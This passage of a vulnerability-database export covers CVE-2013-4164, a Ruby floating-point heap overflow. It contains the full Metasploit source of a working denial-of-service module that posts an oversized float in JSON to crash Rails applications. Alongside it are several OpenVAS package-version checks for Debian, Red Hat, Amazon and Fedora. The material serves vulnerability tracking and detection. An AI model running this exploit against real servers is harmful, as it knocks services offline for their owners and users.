"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-12T22:11:15", "description": "When Ruby attempts to convert a string representation of a large floating point decimal number to its floating point equivalent, a heap-based buffer overflow can be triggered. This module has been tested successfully on a Ruby on Rails application using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application crashes with a segfault error. Other versions of Ruby are reported to be affected.\n", "published": "2013-11-22T22:51:02", "type": "metasploit", "title": "Ruby on Rails JSON Processor Floating Point Heap Overflow DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4164"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/HTTP/RAILS_JSON_FLOAT_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS',\n 'Description' => %q{\n When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. Other versions of Ruby are reported to be affected.\n },\n 'Author' =>\n [\n 'Charlie Somerville', # original discoverer\n 'joev', # bash PoC\n 'todb', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-4164' ],\n [ 'OSVDB', '100113' ],\n [ 'URL', 'https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/' ]\n ],\n 'DisclosureDate' => '2013-11-22'))\n register_options(\n [\n OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),\n OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])\n ])\n end\n\n def uri\n normalize_uri(target_uri.path.to_s)\n end\n\n def verb\n datastore['HTTPVERB'] || 'POST'\n end\n\n def digit_pattern\n @digit_pattern ||= rand(10_000).to_s\n end\n\n def integer_part\n digit_pattern\n end\n\n def multiplier\n (500_000 * (1.0/digit_pattern.size)).to_i\n end\n\n def fractional_part\n digit_pattern * multiplier\n end\n\n # The evil_float seems to require some repeating element. Maybe\n # it's just superstition, but straight up 300_002-lenth random\n # numbers don't appear to trigger the vulnerability. Also, these are\n # easier to produce, and slightly better than the static \"1.1111...\"\n # for 300,000 decimal places.\n def evil_float_string\n [integer_part,fractional_part].join('.')\n end\n\n def run\n print_status \"Using digit pattern of #{digit_pattern} taken to #{multiplier} places\"\n sploit = '['\n sploit << evil_float_string\n sploit << ']'\n print_status \"Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}\"\n target_available = true\n\n begin\n res = send_request_cgi(\n {\n 'method' => verb,\n 'uri' => uri,\n 'ctype' => \"application/json\",\n 'data' => sploit\n })\n rescue ::Rex::ConnectionRefused\n print_error \"Unable to connect. (Connection refused)\"\n target_available = false\n rescue ::Rex::HostUnreachable\n print_error \"Unable to connect. (Host unreachable)\"\n target_available = false\n rescue ::Rex::ConnectionTimeout\n print_error \"Unable to connect. (Timeout)\"\n target_available = false\n end\n\n return unless target_available\n\n print_status \"Checking availability\"\n begin\n res = send_request_cgi({\n 'method' => verb,\n 'uri' => uri,\n 'ctype' => \"application/json\",\n 'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json\n })\n if res and res.body and res.body.size > 0\n target_available = true\n else\n print_good \"#{peer}#{uri} - DoS appears successful (No useful response from host)\"\n target_available = false\n end\n rescue ::Rex::ConnectionError, Errno::ECONNRESET\n print_good \"DoS appears successful (Host unreachable)\"\n target_available = false\n end\n\n return unless target_available\n\n print_error \"Target is still responsive, DoS was unsuccessful.\"\n\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/rails_json_float_dos.rb"}], "openvas": [{"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "Charlie Somerville discovered that Ruby incorrectly handled floating\npoint number conversion. If an application using Ruby accepted untrusted\ninput strings and converted them to floating point numbers, an attacker\nable to provide such input could cause the application to crash or,\npossibly, execute arbitrary code with the privileges of the application.", "modified": "2019-03-18T00:00:00", "published": "2013-12-04T00:00:00", "id": "OPENVAS:1361412562310892810", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892810", "type": "openvas", "title": "Debian Security Advisory DSA 2810-1 (ruby1.9.1 - heap overflow)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2810.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2810-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892810\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2013-4164\");\n script_name(\"Debian Security Advisory DSA 2810-1 (ruby1.9.1 - heap overflow)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-12-04 00:00:00 +0100 (Wed, 04 Dec 2013)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2810.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"ruby1.9.1 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.9.2.0-2+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.9.3.194-8.1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.9.3.484-1.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\");\n script_tag(name:\"summary\", value:\"Charlie Somerville discovered that Ruby incorrectly handled floating\npoint number conversion. If an application using Ruby accepted untrusted\ninput strings and converted them to floating point numbers, an attacker\nable to provide such input could cause the application to crash or,\npossibly, execute arbitrary code with the privileges of the application.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libruby1.9.1-dbg\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9.1\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ri1.9.1\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1-dev\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1-elisp\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1-examples\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1-full\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libruby1.9.1-dbg\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ri1.9.1\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1-dev\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1-examples\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.1-full\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby1.9.3\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-11-26T00:00:00", "id": "OPENVAS:1361412562310871087", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871087", "type": "openvas", "title": "RedHat Update for ruby RHSA-2013:1764-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2013:1764-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871087\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-26 10:51:32 +0530 (Tue, 26 Nov 2013)\");\n script_cve_id(\"CVE-2013-4164\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for ruby RHSA-2013:1764-01\");\n\n\n script_tag(name:\"affected\", value:\"ruby on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"Ruby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the application\nto crash or, possibly, execute arbitrary code with the privileges of the\napplication. (CVE-2013-4164)\n\nAll ruby users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2013:1764-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-November/msg00043.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.7.352~13.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:01:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120122", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120122", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2013-247)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120122\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:05 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2013-247)\");\n script_tag(name:\"insight\", value:\"Heap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before revision 43780 allows context-dependent attackers to cause a denial of service (segmentation fault) and possibly execute arbitrary code via a string that is converted to a floating point value, as demonstrated using (1) the to_f method or (2) JSON.parse.\");\n script_tag(name:\"solution\", value:\"Run yum update ruby19 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2013-247.html\");\n script_cve_id(\"CVE-2013-4164\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"rubygem19-json\", rpm:\"rubygem19-json~1.5.5~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem19-io-console\", rpm:\"rubygem19-io-console~0.3~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby19-libs\", rpm:\"ruby19-libs~1.9.3.484~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem19-bigdecimal\", rpm:\"rubygem19-bigdecimal~1.1.0~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby19\", rpm:\"ruby19~1.9.3.484~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby19-debuginfo\", rpm:\"ruby19-debuginfo~1.9.3.484~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby19-doc\", rpm:\"ruby19-doc~1.9.3.484~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby19-irb\", rpm:\"ruby19-irb~1.9.3.484~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem19-minitest\", rpm:\"rubygem19-minitest~2.5.1~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem19-rdoc\", rpm:\"rubygem19-rdoc~3.9.5~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems19\", rpm:\"rubygems19~1.8.23~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems19-devel\", rpm:\"rubygems19-devel~1.8.23~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem19-rake\", rpm:\"rubygem19-rake~0.9.2.2~31.55.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:51:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "Charlie Somerville discovered that Ruby incorrectly handled floating\npoint number conversion. If an application using Ruby accepted untrusted\ninput strings and converted them to floating point numbers, an attacker\nable to provide such input could cause the application to crash or,\npossibly, execute arbitrary code with the privileges of the application.", "modified": "2017-07-07T00:00:00", "published": "2013-12-04T00:00:00", "id": "OPENVAS:892810", "href": "http://plugins.openvas.org/nasl.php?oid=892810", "type": "openvas", "title": "Debian Security Advisory DSA 2810-1 (ruby1.9.1 - heap overflow)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2810.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2810-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"ruby1.9.1 on Debian Linux\";\ntag_insight = \"Ruby is the interpreted scripting language for quick and easy\nobject-oriented programming. It has many features to process text\nfiles and to do system management tasks (as in perl). It is simple,\nstraight-forward, and extensible.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.9.2.0-2+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.9.3.194-8.1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.9.3.484-1.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\";\ntag_summary = \"Charlie Somerville discovered that Ruby incorrectly handled floating\npoint number conversion. If an application using Ruby accepted untrusted\ninput strings and converted them to floating point numbers, an attacker\nable to provide such input could cause the application to crash or,\npossibly, execute arbitrary code with the privileges of the application.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892810);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2013-4164\");\n script_name(\"Debian Security Advisory DSA 2810-1 (ruby1.9.1 - heap overflow)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-12-04 00:00:00 +0100 (Wed, 04 Dec 2013)\");\n script_tag(name: \"cvss_base\", value:\"6.8\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2810.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9.1-dbg\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9.1\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.9.1\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1-dev\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1-elisp\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1-examples\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1-full\", ver:\"1.9.2.0-2+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9.1-dbg\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.9.1\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1-dev\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1-examples\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.1-full\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9.3\", ver:\"1.9.3.194-8.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4164"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-03T00:00:00", "id": "OPENVAS:1361412562310867350", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867350", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2013-22393", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ruby FEDORA-2013-22393\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# 